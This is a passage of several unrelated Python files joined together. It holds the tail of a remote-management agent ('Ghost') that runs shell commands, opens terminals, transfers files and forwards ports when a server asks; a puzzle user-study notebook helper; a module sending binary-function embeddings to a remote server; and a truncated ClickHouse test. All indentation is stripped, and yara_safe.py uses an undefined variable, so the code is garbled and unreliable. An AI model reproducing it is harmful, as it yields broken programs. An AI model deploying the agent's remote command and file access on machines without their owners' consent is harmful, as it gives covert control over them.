src_sock.settimeout(_CONNECT_TIMEOUT)
src_sock.connect(('localhost', self._port))
src_sock.send(self._sock.RecvBuf())
while True:
rd, unused_wd, unused_xd = select.select([self._sock, src_sock], [], [])
if self._sock in rd:
data = self._sock.Recv(_BUFSIZE)
if not data:
raise RuntimeError('connection terminated')
src_sock.send(data)
if src_sock in rd:
data = src_sock.recv(_BUFSIZE)
if not data:
break
self._sock.Send(data)
except Exception as e:
logging.error('SpawnPortForwardServer: %s', e)
finally:
if src_sock:
src_sock.close()
self._sock.Close()
logging.info('SpawnPortForwardServer: terminated')
sys.exit(0)
def Ping(self):
def timeout_handler(x):
if x is None:
raise PingTimeoutError
self._last_ping = self.Timestamp()
self.SendRequest('ping', {}, timeout_handler, 5)
def HandleFileDownloadRequest(self, msg):
params = msg['params']
filepath = params['filename']
if not os.path.isabs(filepath):
filepath = os.path.join(os.getenv('HOME', '/tmp'), filepath)
try:
with open(filepath, 'r') as _:
pass
except Exception as e:
return self.SendResponse(msg, str(e))
self.SpawnGhost(self.FILE, params['sid'],
file_op=('download', filepath))
self.SendResponse(msg, SUCCESS)
def HandleFileUploadRequest(self, msg):
params = msg['params']
# Resolve upload filepath
filename = params['filename']
# If dest is specified, use it first
dest_path = params.get('dest', '')
if dest_path:
if not os.path.isabs(dest_path):
dest_path = os.path.join(os.getenv('HOME', '/tmp'), dest_path)
if os.path.isdir(dest_path):
dest_path = os.path.join(dest_path, filename)
else:
target_dir = os.getenv('HOME', '/tmp')
# Terminal session ID found, upload to its current working directory
if 'terminal_sid' in params:
pid = self._terminal_sid_to_pid.get(params['terminal_sid'], None)
if pid:
try:
target_dir = self.GetProcessWorkingDirectory(pid)
except Exception as e:
logging.error(e)
dest_path = os.path.join(target_dir, filename)
try:
os.makedirs(os.path.dirname(dest_path))
except Exception:
pass
try:
with open(dest_path, 'w') as _:
pass
except Exception as e:
return self.SendResponse(msg, str(e))
# If not check_only, spawn FILE mode ghost agent to handle upload
if not params.get('check_only', False):
self.SpawnGhost(self.FILE, params['sid'],
file_op=('upload', dest_path, params.get('perm', None)))
self.SendResponse(msg, SUCCESS)
def HandleRequest(self, msg):
command = msg['name']
params = msg['params']
if command == 'upgrade':
self.Upgrade()
elif command == 'terminal':
self.SpawnGhost(self.TERMINAL, params['sid'],
tty_device=params['tty_device'])
self.SendResponse(msg, SUCCESS)
elif command == 'shell':
self.SpawnGhost(self.SHELL, params['sid'], command=params['command'])
self.SendResponse(msg, SUCCESS)
elif command == 'file_download':
self.HandleFileDownloadRequest(msg)
elif command == 'clear_to_download':
self.StartDownloadServer()
elif command == 'file_upload':
self.HandleFileUploadRequest(msg)
elif command == 'forward':
self.SpawnGhost(self.FORWARD, params['sid'], port=params['port'])
self.SendResponse(msg, SUCCESS)
def HandleResponse(self, response):
rid = str(response['rid'])
if rid in self._requests:
handler = self._requests[rid][2]
del self._requests[rid]
if callable(handler):
handler(response)
else:
logging.warning('Received unsolicited response, ignored')
def ParseMessage(self, buf, single=True):
if single:
try:
index = buf.index(_SEPARATOR)
except ValueError:
self._sock.UnRecv(buf)
return
msgs_json = [buf[:index]]
self._sock.UnRecv(buf[index + len(_SEPARATOR):])
else:
msgs_json = buf.split(_SEPARATOR)
self._sock.UnRecv(msgs_json.pop())
for msg_json in msgs_json:
try:
msg = json.loads(msg_json)
except ValueError:
# Ignore mal-formed message.
logging.error('mal-formed JSON request, ignored')
continue
if 'name' in msg:
self.HandleRequest(msg)
elif 'response' in msg:
self.HandleResponse(msg)
else: # Ignore mal-formed message.
logging.error('mal-formed JSON request, ignored')
def ScanForTimeoutRequests(self):
"""Scans for pending requests which have timed out.
If any timed-out requests are discovered, their handler is called with the
special response value of None.
"""
for rid in list(self._requests.keys()):
request_time, timeout, handler = self._requests[rid]
if self.Timestamp() - request_time > timeout:
if callable(handler):
handler(None)
else:
logging.error('Request %s timeout', rid)
del self._requests[rid]
def InitiateDownload(self):
ttyname, filename = self._download_queue.get()
sid = self._ttyname_to_sid[ttyname]
self.SpawnGhost(self.FILE, terminal_sid=sid,
file_op=('download', filename))
def Listen(self):
try:
while True:
rds, unused_wd, unused_xd = select.select([self._sock], [], [],
_PING_INTERVAL / 2)
if self._sock in rds:
data = self._sock.Recv(_BUFSIZE)
# Socket is closed
if not data:
break
self.ParseMessage(data, self._register_status != SUCCESS)
if (self._mode == self.AGENT and
self.Timestamp() - self._last_ping > _PING_INTERVAL):
self.Ping()
self.ScanForTimeoutRequests()
if not self._download_queue.empty():
self.InitiateDownload()
if self._reset.is_set():
break
except socket.error:
raise RuntimeError('Connection dropped')
except PingTimeoutError:
raise RuntimeError('Connection timeout')
finally:
self.Reset()
self._queue.put('resume')
if self._mode != Ghost.AGENT:
sys.exit(1)
def Register(self):
non_local = {}
for addr in self._overlord_addrs:
non_local['addr'] = addr
def registered(response):
if response is None:
self._reset.set()
raise RuntimeError('Register request timeout')
self._register_status = response['response']
if response['response'] != SUCCESS:
self._reset.set()
raise RuntimeError('Register: ' + response['response'])
else:
logging.info('Registered with Overlord at %s:%d', *non_local['addr'])
self._connected_addr = non_local['addr']
self.Upgrade() # Check for upgrade
self._queue.put('pause', True)
try:
logging.info('Trying %s:%d ...', *addr)
self.Reset()
# Check if server has TLS enabled. Only check if self._tls_mode is
# None.
# Only the control channel needs to determine if TLS is enabled; other
# modes should use the TLSSettings passed in when they were spawned.
if self._mode == Ghost.AGENT:
self._tls_settings.SetEnabled(
self.TLSEnabled(*addr) if self._tls_mode is None
else self._tls_mode)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(_CONNECT_TIMEOUT)
try:
if self._tls_settings.Enabled():
tls_context = self._tls_settings.Context()
sock = tls_context.wrap_socket(sock, server_hostname=addr[0])
sock.connect(addr)
except (ssl.SSLError, ssl.CertificateError) as e:
logging.error('%s: %s', e.__class__.__name__, e)
continue
except IOError as e:
if e.errno == 2: # No such file or directory
logging.error('%s: %s', e.__class__.__name__, e)
continue
raise
self._sock = BufferedSocket(sock)
logging.info('Connection established, registering...')
handler = {
Ghost.AGENT: registered,
Ghost.TERMINAL: self.SpawnTTYServer,
Ghost.SHELL: self.SpawnShellServer,
Ghost.FILE: self.InitiateFileOperation,
Ghost.FORWARD: self.SpawnPortForwardServer,
}[self._mode]
# Machine ID may change if MAC address is used (USB-ethernet dongle
# plugged/unplugged)
self._machine_id = self.GetMachineID()
self.SendRequest('register',
{'mode': self._mode, 'mid': self._machine_id,
'sid': self._session_id,
'properties': self._properties}, handler)
except socket.error:
pass
else:
sock.settimeout(None)
self.Listen()
raise RuntimeError('Cannot connect to any server')
def Reconnect(self):
logging.info('Received reconnect request from RPC server, reconnecting...')
self._reset.set()
def GetStatus(self):
status = self._register_status
if self._register_status == SUCCESS:
ip, port = self._sock.sock.getpeername()
status += ' %s:%d' % (ip, port)
return status
def AddToDownloadQueue(self, ttyname, filename):
self._download_queue.put((ttyname, filename))
def RegisterTTY(self, session_id, ttyname):
self._ttyname_to_sid[ttyname] = session_id
def RegisterSession(self, session_id, process_id):
self._terminal_sid_to_pid[session_id] = process_id
def StartLanDiscovery(self):
"""Start to listen to LAN discovery packet at
_OVERLORD_LAN_DISCOVERY_PORT."""
def thread_func():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
try:
s.bind(('0.0.0.0', _OVERLORD_LAN_DISCOVERY_PORT))
except socket.error as e:
logging.error('LAN discovery: %s, abort', e)
return
logging.info('LAN Discovery: started')
while True:
rd, unused_wd, unused_xd = select.select([s], [], [], 1)
if s in rd:
data, source_addr = s.recvfrom(_BUFSIZE)
parts = data.split()
if parts[0] == 'OVERLORD':
ip, port = parts[1].split(':')
if not ip:
ip = source_addr[0]
self._queue.put((ip, int(port)), True)
try:
obj = self._queue.get(False)
except Queue.Empty:
pass
else:
if not isinstance(obj, str):
self._queue.put(obj)
elif obj == 'pause':
logging.info('LAN Discovery: paused')
while obj != 'resume':
obj = self._queue.get(True)
logging.info('LAN Discovery: resumed')
t = threading.Thread(target=thread_func)
t.daemon = True
t.start()
def StartRPCServer(self):
logging.info('RPC Server: started')
rpc_server = SimpleJSONRPCServer((_DEFAULT_BIND_ADDRESS, _GHOST_RPC_PORT),
logRequests=False)
rpc_server.register_function(self.Reconnect, 'Reconnect')
rpc_server.register_function(self.GetStatus, 'GetStatus')
rpc_server.register_function(self.RegisterTTY, 'RegisterTTY')
rpc_server.register_function(self.RegisterSession, 'RegisterSession')
rpc_server.register_function(self.AddToDownloadQueue, 'AddToDownloadQueue')
t = threading.Thread(target=rpc_server.serve_forever)
t.daemon = True
t.start()
def ScanServer(self):
for meth in [self.GetGateWayIP, self.GetFactoryServerIP]:
for addr in [(x, _OVERLORD_PORT) for x in meth()]:
if addr not in self._overlord_addrs:
self._overlord_addrs.append(addr)
def Start(self, lan_disc=False, rpc_server=False):
logging.info('%s started', self.MODE_NAME[self._mode])
logging.info('MID: %s', self._machine_id)
logging.info('SID: %s', self._session_id)
# We don't care about the child process's return code, so no wait is
# needed. Ignoring SIGCHLD prevents zombie processes from lingering.
self.SetIgnoreChild(True)
if lan_disc:
self.StartLanDiscovery()
if rpc_server:
self.StartRPCServer()
try:
while True:
try:
addr = self._queue.get(False)
except Queue.Empty:
pass
else:
if isinstance(addr, tuple) and addr not in self._overlord_addrs:
logging.info('LAN Discovery: got overlord address %s:%d', *addr)
self._overlord_addrs.append(addr)
try:
self.ScanServer()
self.Register()
# Don't show stack trace for RuntimeError, which we use in this file for
# plausible and expected errors (such as can't connect to server).
except RuntimeError as e:
logging.info('%s, retrying in %ds', e.message, _RETRY_INTERVAL)
time.sleep(_RETRY_INTERVAL)
except Exception as e:
unused_x, unused_y, exc_traceback = sys.exc_info()
traceback.print_tb(exc_traceback)
logging.info('%s: %s, retrying in %ds',
e.__class__.__name__, e.message, _RETRY_INTERVAL)
time.sleep(_RETRY_INTERVAL)
self.Reset()
except KeyboardInterrupt:
logging.error('Received keyboard interrupt, quit')
sys.exit(0)
def GhostRPCServer():
"""Returns handler to Ghost's JSON RPC server."""
return jsonrpclib.Server('http://localhost:%d' % _GHOST_RPC_PORT)
def ForkToBackground():
"""Fork process to run in background."""
pid = os.fork()
if pid != 0:
logging.info('Ghost(%d) running in background.', pid)
sys.exit(0)
def DownloadFile(filename):
"""Initiate a client-initiated file download."""
filepath = os.path.abspath(filename)
if not os.path.exists(filepath):
logging.error('file `%s\' does not exist', filename)
sys.exit(1)
# Check if we actually have permission to read the file
if not os.access(filepath, os.R_OK):
logging.error('cannot open %s for reading', filepath)
sys.exit(1)
server = GhostRPCServer()
server.AddToDownloadQueue(os.ttyname(0), filepath)
sys.exit(0)
def main():
# Setup logging format
logger = logging.getLogger()
logger.setLevel(logging.INFO)
handler = logging.StreamHandler()
formatter = logging.Formatter('%(asctime)s %(message)s', '%Y/%m/%d %H:%M:%S')
handler.setFormatter(formatter)
logger.addHandler(handler)
parser = argparse.ArgumentParser()
parser.add_argument('--fork', dest='fork', action='store_true', default=False,
help='fork process to run in background')
parser.add_argument('--mid', metavar='MID', dest='mid', action='store',
default=None, help='use MID as machine ID')
parser.add_argument('--rand-mid', dest='mid', action='store_const',
const=Ghost.RANDOM_MID, help='use random machine ID')
parser.add_argument('--no-lan-disc', dest='lan_disc', action='store_false',
default=True, help='disable LAN discovery')
parser.add_argument('--no-rpc-server', dest='rpc_server',
action='store_false', default=True,
help='disable RPC server')
parser.add_argument('--tls', dest='tls_mode', default='detect',
choices=('y', 'n', 'detect'),
help="specify 'y' or 'n' to force enable/disable TLS")
parser.add_argument('--tls-cert-file', metavar='TLS_CERT_FILE',
dest='tls_cert_file', type=str, default=None,
help='file containing the server TLS certificate in PEM '
'format')
parser.add_argument('--tls-no-verify', dest='tls_no_verify',
action='store_true', default=False,
help='do not verify certificate if TLS is enabled')
parser.add_argument('--prop-file', metavar='PROP_FILE', dest='prop_file',
type=str, default=None,
help='file containing the JSON representation of client '
'properties')
parser.add_argument('--download', metavar='FILE', dest='download', type=str,
default=None, help='file to download')
parser.add_argument('--reset', dest='reset', default=False,
action='store_true',
help='reset ghost and reload all configs')
parser.add_argument('--status', dest='status', default=False,
action='store_true',
help='show status of the client')
parser.add_argument('overlord_ip', metavar='OVERLORD_IP', type=str,
nargs='*', help='overlord server address')
args = parser.parse_args()
if args.status:
print(GhostRPCServer().GetStatus())
sys.exit()
if args.fork:
ForkToBackground()
if args.reset:
GhostRPCServer().Reconnect()
sys.exit()
if args.download:
DownloadFile(args.download)
addrs = [('localhost', _OVERLORD_PORT)]
addrs = [(x, _OVERLORD_PORT) for x in args.overlord_ip] + addrs
prop_file = os.path.abspath(args.prop_file) if args.prop_file else None
tls_settings = TLSSettings(args.tls_cert_file, not args.tls_no_verify)
tls_mode = args.tls_mode
tls_mode = {'y': True, 'n': False, 'detect': None}[tls_mode]
g = Ghost(addrs, tls_settings, Ghost.AGENT, args.mid,
prop_file=prop_file, tls_mode=tls_mode)
g.Start(args.lan_disc, args.rpc_server)
if __name__ == '__main__':
try:
main()
except Exception as e:
logging.error(e)
|
demo.py | from __future__ import print_function
import ipywidgets as widgets
from IPython.display import clear_output, display, Markdown, Javascript
import IPython
from demo import study_puzzles
from typing import List, Set, Tuple, Callable
import inspect
import shutil
import os
import re
import time
import threading
import pickle as pkl
import logging
import getpass
import subprocess
from tempfile import TemporaryDirectory
IPYNP_FILE = 'Demo.ipynb'
LOCAL = True
#temp_dir = TemporaryDirectory() # local version. Will create a new dir each time so it's not stateful...
#out_dir = temp_dir.name
out_dir = "state"
os.makedirs(out_dir, exist_ok=True)
log_path = os.path.join(out_dir, 'run.log')
logger = logging.getLogger(__name__)
logging.basicConfig(
format="%(asctime)s - %(levelname)s - %(name)s - %(message)s",
datefmt="%m/%d/%Y %H:%M:%S",
level=logging.INFO,
handlers=[logging.FileHandler(log_path)],
)
_max_mins = 6
_max_seconds = _max_mins * 60
def warmup_puzzle(s: str):
return
def log(msg, level=logging.INFO):
logger.log(level, msg)
state.log.append((time.time(), level, msg))
def submit_years(years: int):
if LOCAL:
print("This is running locally")
else:
if not isinstance(years, int):
print('Please submit an integer.')
return
log(f"Number of years programming in python: {years}.")
print('Thanks!')
def update_progress_bar():
global progress_bar
while True:
time.sleep(1.0)
try:
if progress_bar.value == progress_bar.max:
progress_bar.description = 'Out of time'
progress_bar.bar_style = 'danger'
progress_bar.value = time.time() - state.cur.start_time
except Exception:
pass  # progress_bar may not exist yet or may already be closed
# globals
STATE_FILENAME = os.path.join(out_dir, "state.pkl")
state = None # set by load_state function
__puzzle__ = None # set by next_puzzle function
n_attempts = None # set by puzzle function
progress_bar = None # for display
threading.Thread(target=update_progress_bar).start() # progress bar timer update thread
fireworks_gif = None # for display
global_hook = IPython.core.getipython.get_ipython().ev("globals()") # we can use to reset puzzle fun if they override
def check_hook():
if "puzzle" in global_hook and global_hook["puzzle"] is not puzzle:
# print("Uh oh, seems that you have over-rided the puzzle function. Please don't do that. Re-defining it.")
log("Doh! They overrode the puzzle function. :-(", level=logging.ERROR)
global_hook["puzzle"] = puzzle
save_state()
def restart_state():
resp = input('Are you sure you want to delete the state? type "yes" to reset or "no" to cancel: ')
if resp != 'yes':
return
print("OK!")
t = '_' + time.ctime().replace(' ', '_')
shutil.move(STATE_FILENAME, STATE_FILENAME + t)
load_state()
def load_state():
"""creates if does not exist"""
# print(" Loading state")
global state
check_hook()
if os.path.exists(STATE_FILENAME):
with open(STATE_FILENAME, "rb") as f:
state = pkl.load(f)
else:
state = State() # this is where the state is first initialized
# print("*** Creating state")
save_state()
def save_state():
check_hook()
# print(" Saving state")
with open(STATE_FILENAME, "wb") as f:
pkl.dump(state, f)
# To store snapshots of the notebook:
if False:
display(Javascript("IPython.notebook.save_notebook()"))
t = '_' + time.ctime().replace(' ', '_')
#command = f'jupyter nbconvert {IPYNP_FILE} --output {os.path.join(out_dir, IPYNP_FILE + t)}.html'
#subprocess.call(command)
time.sleep(1)
shutil.copy(IPYNP_FILE, os.path.join(out_dir, IPYNP_FILE + t + '.ipynb'))
class PuzzleData:
def __init__(self, src: str, num: int, name: str, part: str):
self.num = num
self.name = name
self.part = part
self.start_time = None
self.solve_time = None
self.give_up_time = None
self.n_attempts = None
self.src = src
def __str__(self):
return f"""
num = {self.num}
name = {self.name}
part = {self.part}
start_time = {self.start_time}
solve_time = {self.solve_time}
give_up_time = {self.give_up_time}
n_attempts = {self.n_attempts}
src = {self.src}"""
class State:
"""
state.cur points to the PuzzleData of state.puzzles that we are currently on. When done, state.cur is None.
Initially state.cur = self.puzzles[0], but its start_time is None.
"""
def __init__(self):
self.log = [] # redundant log
self.puzzles = []
for p in study_puzzles.get_puzzles():
self.puzzles.append(PuzzleData(p["src"], len(self.puzzles), p["name"], p["part"]))
self.cur = self.puzzles[0]
def __str__(self):
return f"cur: {self.cur}" + "\n" + f"log: [{len(self.log)}]" + "\n".join(str(l)[:100] for l in self.log[-5:])
def submit_feedback(text):
log("Feedback: " + text)
save_state()
if LOCAL:
print("This is the local version so we won't see this. But please send us an email!")
else:
print("Feedback logged, thank you!")
def notify_next():
print("Run next_puzzle() when you are ready to begin the next puzzle.")
def cur_puzzle(reload_state=True):
if reload_state:
load_state()
if state.cur is None:
print(f"All parts complete!")
print_solving_times()
return
if state.cur.start_time is None or state.cur.solve_time is not None or state.cur.give_up_time is not None:
notify_next()
return
if time.time() - state.cur.start_time > _max_seconds:
print('Time is up.')
give_up()
return
reset_widgets()
display(progress_bar)
if state.cur.give_up_time is None and time.time() - state.cur.start_time > _max_seconds:
print("Out of time.")
print(f"{state.cur.name} ({state.cur.part})") # (STUDY {_study_idx}/{NUM_STUDIES}):")
print("============")
print()
print(state.cur.src)
with open("fireworks.gif", "rb") as f:
_fireworks_image = f.read()
def reset_widgets(): # close existing widgets
try:
global progress_bar, fireworks_gif
if progress_bar is not None:
progress_bar.close()
progress_bar = widgets.IntProgress(value=0, min=0, max=_max_seconds, description='Time:', bar_style='warning')
if fireworks_gif is not None:
fireworks_gif.close()
fireworks_gif = widgets.Image(
value=_fireworks_image,
format='gif',
width=100,
height=200,
)
except Exception as e:
logger.error("reset_widgets exception")
def print_solving_times():
print("=" * 10)
print('Check our "Programming Puzzles" paper (section 5.1) to see how difficult GPT-3 and others found each puzzle to be: https://arxiv.org/abs/2106.05784')
print()
print('Visit our GitHub repository to explore the full dataset and contribute your own puzzles: https://github.com/microsoft/PythonProgrammingPuzzles')
print("=" * 10)
print("Your solving times (minutes:seconds):")
for i, puz in enumerate(state.puzzles):
if i < 3:
# Warmup.
continue
if state.cur is not None and state.cur.num < puz.num:
return
if puz.solve_time:
elapsed = puz.solve_time - puz.start_time
time_str = time.strftime("%M:%S", time.gmtime(elapsed))
print(f"Puzzle {puz.num - 2}: {time_str}")
else:
print(f"Puzzle {puz.num - 2}: Unsolved")
def check_finished_part():
if state.cur is None:
cur_puzzle(reload_state=False)
elif state.cur is state.puzzles[-1]: # done!
state.cur = None
save_state()
cur_puzzle(reload_state=False) # notifies that they are done
return True
else:
if state.cur.part != state.puzzles[state.cur.num + 1].part:
print(f"Finished {state.cur.part}!!!")
print("Continue to the next part when you are ready.")
if state.cur.part != "WARM UP": # Warmup
print_solving_times()
else:
print("You will get a summary of your solving times after each part.")
state.cur = state.puzzles[state.cur.num + 1]
save_state()
return True
return False
def give_up():
# don't load state
check_hook()
if state.cur is None:
cur_puzzle() # notifies them that they are done
return
if state.cur.solve_time:
print("Cannot give up since you already solved this puzzle.")
else:
if not state.cur.start_time:
print("Cannot give up on a puzzle before you started it.")
elif state.cur.give_up_time is None:
elapsed = time.time() - state.cur.start_time
if elapsed < _max_seconds:
resp = input('Are you sure you want to give up on this puzzle? type "yes" to give up or "no" to keep trying: ')
if resp != 'yes':
return
state.cur.give_up_time = time.time()
elapsed = state.cur.give_up_time - state.cur.start_time
if last["num"] == state.cur.num:
state.cur.n_attempts = last["n_attempts"]
log(f"Gave up {state.cur.num} after {elapsed:.2f} seconds and {last['n_attempts']} attempts")
reset_widgets()
save_state()
if check_finished_part():
return
notify_next()
def next_puzzle():
load_state()
if state.cur is None: # already done
cur_puzzle(reload_state=False) # prints completion msg
return
if state.cur.start_time is not None:
if state.cur.solve_time is None and state.cur.give_up_time is None:
elapsed = time.time() - state.cur.start_time
if elapsed < _max_seconds:
print(f"You haven't solved this puzzle yet and time has not expired.")
print(f"You have {_max_seconds - elapsed:.0f} seconds to continue trying to solve the puzzle.")
print("You may type give_up() and then next_puzzle(), or cur_puzzle() to see the current puzzle.")
return
else:
log(f"Time out {state.cur.num} after {elapsed:.2f} seconds and {last['n_attempts']} attempts")
reset_widgets()
if check_finished_part():
return
state.cur = state.puzzles[state.cur.num + 1]
else:
reset_widgets()
state.cur.start_time = time.time()
save_state()
cur_puzzle(reload_state=False)
def check_type(x): # TODO: update to multiple arguments, tuples, and functions
desired_type_str = re.match(r"def puzzle\([^:]*: (.*)\)", state.cur.src).group(1).strip()
def helper(obj, type_str):
t = type(obj)
if type_str == "int":
success = t == int
elif type_str == "str":
success = t == str
elif type_str == "float":
success = t == float
else:
assert "[" in type_str and type_str[-1] == "]", f"Unknown type {type_str}"
inner_type = type_str[type_str.index("[") + 1:-1].strip()
success = False
if type_str.startswith("List"):
if t == list:
if not all(helper(y, inner_type) for y in obj):
return False
success = True
elif type_str.startswith("Set"):
if t == set:
if not all(helper(y, inner_type) for y in obj):
return False
success = True
else:
assert False, f"TODO: implement type checking for '{type_str}'"
if not success:
print(f"TypeError: puzzle expecting {type_str}, got type {t} in: {str(obj)[:50]}...")
return success
return helper(x, desired_type_str)
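# Added sketch (not part of the study code): how the annotation regex above
# pulls the desired type out of a puzzle's source.
_demo_src = "def puzzle(li: List[int]):\n    return len(li) == 3"
assert re.match(r"def puzzle\([^:]*: (.*)\)", _demo_src).group(1).strip() == "List[int]"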
last = { # previous evaluation, tracked so we don't load_state if called a million times in a loop
"num": None,
"time": None,
"n_attempts": None,
"func": None
}
class AlreadySolvedError(Exception):
pass
def puzzle(solution):
if state.cur is None or state.cur.num != last["num"] or time.time() - last["time"] > 10:
load_state() # if more than 10 seconds have elapsed since last attempt
if state.cur is None:
cur_puzzle() # notify that all done
return
if state.cur.start_time is None:
print("Haven't started.")
notify_next()
return
if state.cur.num != last["num"]:
loc = locals().copy()
exec(state.cur.src, None, loc)
last["func"] = loc["puzzle"]
last["num"] = state.cur.num
last["n_attempts"] = 0
if state.cur.solve_time is not None:
print(f"You've already solved {state.cur.name}")
notify_next()
raise AlreadySolvedError
if state.cur.give_up_time is not None:
print(f"You ran out of time for {state.cur.name}")
notify_next()
return
last["n_attempts"] += 1
last["time"] = time.time()
if time.time() - state.cur.start_time > _max_seconds:
print('Time is up.')
give_up()
return
if not check_type(solution):
return TypeError
puzzle_ = last["func"]
result = puzzle_(solution) # exceptions happen
last["time"] = time.time()
elapsed = last["time"] - state.cur.start_time
if result is True:
reset_widgets()
state.cur.solve_time = last["time"]
state.cur.n_attempts = last["n_attempts"] # only update when solved or give up
time_str = time.strftime("%M:%S", time.gmtime(elapsed))
display(Markdown(f'<span style="color: green">CORRECT in {time_str} sec.</span>'))
log(f"Solved {state.cur.num} in {elapsed:.2f} seconds using {last['n_attempts']} attempts")
save_state()
display(fireworks_gif, widgets.Output())
check_finished_part()
return result
load_state() # initialize
|
yara_safe.py | import os
import hashlib
import json
from FunctionAnalyzerRadare import RadareFunctionAnalyzer
from InstructionsConverter import InstructionsConverter
from FunctionNormalizer import FunctionNormalizer
import requests
from multiprocessing import Process, Queue
import traceback
import tempfile
import sys
tf_serving = "http://yarasafe.diag.uniroma1.it:8500/v1/models/safe:predict"
def read_string_from_pipe(f):
byte = True
received = ""
while byte:
byte = os.read(f,1)
if byte == b'\0':
break
received += byte.decode("utf-8")
return received
def read_stream_from_pipe(f, bytes_to_read):
received = bytes()
for i in range(0, bytes_to_read):
byte = os.read(f,1)
received += byte
return received
def write_string_to_pipe(f, msg):
for c in msg:
os.write(f,bytes(c, 'utf-8'))
os.write(f, b'\0')
return len(msg)
def wait_for_programs(f):
msg_bytes = int(read_string_from_pipe(f))
msg = read_stream_from_pipe(f, msg_bytes)
return msg, msg_bytes
def check_exit(msg):
    return msg == b"exit"
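# Illustrative round-trip for the framing protocol above (a NUL-terminated
# ASCII length header followed by the raw payload); _demo_pipe_roundtrip is
# a sketch using a local os.pipe(), while the real callers use named pipes.
def _demo_pipe_roundtrip():
    r, w = os.pipe()
    payload = b"\x90\x90\xc3"
    write_string_to_pipe(w, str(len(payload)))  # length header
    os.write(w, payload)                        # payload body
    msg, n = wait_for_programs(r)
    os.close(r)
    os.close(w)
    return msg == payload and n == len(payload)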
def worker(queue, name):
#analyzer = IDAFunctionAnalyzer(name, False, 0)
analyzer = RadareFunctionAnalyzer(name, False, 0)
functions = analyzer.analyze()
queue.put(functions)
analyzer.close()
def embed_program(program, converter):
try:
tmp_file = tempfile.NamedTemporaryFile("wb", delete=False)
tmp_file.write(program)
name = tmp_file.name
tmp_file.close()
#print("[DEBUG] Analyzing file with sha256: {}, size: {}".format(hash, str(len(program))))
q = Queue()
p = Process(target=worker, args=(q, name))
p.start()
functions = q.get()
p.join()
normalizer = FunctionNormalizer(150)
converted = []
embeddings = []
num_fcns = len(functions)
fcns = []
new_fcn = []
for i, f in enumerate(functions):
fcns.append(f)
converted.append(converter.convert_to_ids(functions[f]['filtered_instructions']))
if (i % 500 == 0) or (i == num_fcns - 1):
instructions, lengths = normalizer.normalize_functions(converted)
converted = []
payload = {"signature_name": "safe", "inputs": {"instruction": instructions, "lenghts": lenghts}}
r = requests.post(tf_serving, data=json.dumps(payload))
tmp = json.loads(r.text)
if "outputs" in tmp:
new_fcn.extend(fcns)
embeddings.extend(tmp["outputs"])
fcns = []
result = {}
if len(embeddings) == 0:
if os.path.exists(name):
os.remove(name)
return result
for i, f in enumerate(new_fcn):
result[f] = embeddings[i]
except:
traceback.print_exc()
result = {}
try:
    os.remove(name)
except Exception:
    pass
return result
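# The 500-function batching above could also be expressed with a generic
# chunking helper; _chunks is a hypothetical sketch, not part of the module.
def _chunks(items, size=500):
    batch = []
    for item in items:
        batch.append(item)
        if len(batch) == size:
            yield batch
            batch = []
    if batch:
        yield batch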
def launch(data):
    #print("[Python] Hello from python len: {}".format(len(data)))
    w2id_path = os.path.join(os.environ["YARAPYSCRIPT"], "i2v", "word2id.json")
    converter = InstructionsConverter(w2id_path)
    result = embed_program(data, converter)
#print("[Python] embedding done")
return json.dumps(result)
if __name__ == "__main__":
f = open(sys.argv[1], "rb")
content = f.read()
f.close()
w2id_path = os.path.join(os.environ["YARAPYSCRIPT"], "i2v", "word2id.json")
converter = InstructionsConverter(w2id_path)
result = embed_program(content, converter)
#print("[Python] embedding done")
print(json.dumps(result))
|
test.py | import json
import pytest
import random
import re
import string
import threading
import time
from multiprocessing.dummy import Pool
from helpers.client import QueryRuntimeException
from helpers.cluster import ClickHouseCluster
from helpers.test_tools import TSV
cluster = ClickHouseCluster(__file__)
node1 = cluster.add_instance('node1',
config_dir='configs',
main_configs=['configs/logs_config.xml'],
with_zookeeper=True,
stay_alive=True,
tmpfs=['/jbod1:size=40M', '/jbod2:size=40M', '/external:size=200M'],
macros={"shard": 0, "replica": 1} )
node2 = cluster.add_instance('node2',
config_dir='configs',
main_configs=['configs/logs_config.xml'],
with_zookeeper=True,
stay_alive=True,
tmpfs=['/jbod1:size=40M', '/jbod2:size=40M', '/external:size=200M'],
macros={"shard": 0, "replica": 2} )
@pytest.fixture(scope="module")
def start_cluster():
try:
cluster.start()
yield cluster
finally:
cluster.shutdown()
def test_system_tables(start_cluster):
expected_disks_data = [
{
"name": "default",
"path": "/var/lib/clickhouse/",
"keep_free_space": '1024',
},
{
"name": "jbod1",
"path": "/jbod1/",
"keep_free_space": '0',
},
{
"name": "jbod2",
"path": "/jbod2/",
"keep_free_space": '10485760',
},
{
"name": "external",
"path": "/external/",
"keep_free_space": '0',
}
]
click_disk_data = json.loads(node1.query("SELECT name, path, keep_free_space FROM system.disks FORMAT JSON"))["data"]
assert sorted(click_disk_data, key=lambda x: x["name"]) == sorted(expected_disks_data, key=lambda x: x["name"])
expected_policies_data = [
{
"policy_name": "small_jbod_with_external",
"volume_name": "main",
"volume_priority": "1",
"disks": ["jbod1"],
"max_data_part_size": "0",
"move_factor": 0.1,
},
{
"policy_name": "small_jbod_with_external",
"volume_name": "external",
"volume_priority": "2",
"disks": ["external"],
"max_data_part_size": "0",
"move_factor": 0.1,
},
{
"policy_name": "one_more_small_jbod_with_external",
"volume_name": "m",
"volume_priority": "1",
"disks": ["jbod1"],
"max_data_part_size": "0",
"move_factor": 0.1,
},
{
"policy_name": "one_more_small_jbod_with_external",
"volume_name": "e",
"volume_priority": "2",
"disks": ["external"],
"max_data_part_size": "0",
"move_factor": 0.1,
},
{
"policy_name": "jbods_with_external",
"volume_name": "main",
"volume_priority": "1",
"disks": ["jbod1", "jbod2"],
"max_data_part_size": "10485760",
"move_factor": 0.1,
},
{
"policy_name": "jbods_with_external",
"volume_name": "external",
"volume_priority": "2",
"disks": ["external"],
"max_data_part_size": "0",
"move_factor": 0.1,
},
{
"policy_name": "moving_jbod_with_external",
"volume_name": "main",
"volume_priority": "1",
"disks": ["jbod1"],
"max_data_part_size": "0",
"move_factor": 0.7,
},
{
"policy_name": "moving_jbod_with_external",
"volume_name": "external",
"volume_priority": "2",
"disks": ["external"],
"max_data_part_size": "0",
"move_factor": 0.7,
},
{
"policy_name": "default_disk_with_external",
"volume_name": "small",
"volume_priority": "1",
"disks": ["default"],
"max_data_part_size": "2097152",
